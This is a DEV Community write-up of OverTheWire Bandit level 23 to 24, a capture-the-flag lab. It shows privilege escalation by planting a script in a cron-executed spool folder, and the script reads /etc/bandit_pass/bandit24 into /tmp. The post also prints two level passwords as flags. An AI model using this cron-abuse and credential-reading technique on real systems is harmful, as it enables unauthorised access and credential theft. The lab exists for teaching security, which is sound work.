DEV Community

Cover image for Bandit Level 23 Level 24
Christian Paez
Christian Paez

Posted on

Bandit Level 23 Level 24

Introduction

Welcome back, in this level we will learn some basics of privilege escalation by abusing cron jobs.

Previous flag

QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
Enter fullscreen mode Exit fullscreen mode

Checking Cron files

Let´s start checking cron jobs for the user bandit24.

cat /etc/cron.d/cronjob_bandit24
Enter fullscreen mode Exit fullscreen mode

The entries within this file reveal the location of a script in the /usr/bin folder.

Reading Cron Script

Let’s open the .sh script file and check its contents:

cat /usr/bin/cronjob_bandit24.sh
Enter fullscreen mode Exit fullscreen mode

The contents of this file show us that the cron job iterates over the files in the /var/spool/bandit24/foo folder and executes files owned by us, bandit23

#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done
Enter fullscreen mode Exit fullscreen mode

Let’s write a bash command that copies the password from bandit24 to a temporary location


cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt
Enter fullscreen mode Exit fullscreen mode

Abusing the Cron Job

Create a directory and script to intercept the password:

mkdir /tmp/bandit23
nano /var/spool/bandit24/foo/script.sh
Enter fullscreen mode Exit fullscreen mode

Within the newly created script, inscribe the command we defined before:

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt
Enter fullscreen mode Exit fullscreen mode

Grant execution permissions to the script:

chmod +x /var/spool/bandit24/foo/script.sh
Enter fullscreen mode Exit fullscreen mode

Now, the exploit is set. After the cron job is executed, we can read the password for the next level:

cat /tmp/bandit23/password.txt
Enter fullscreen mode Exit fullscreen mode

Flag:

VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
Enter fullscreen mode Exit fullscreen mode

Top comments (0)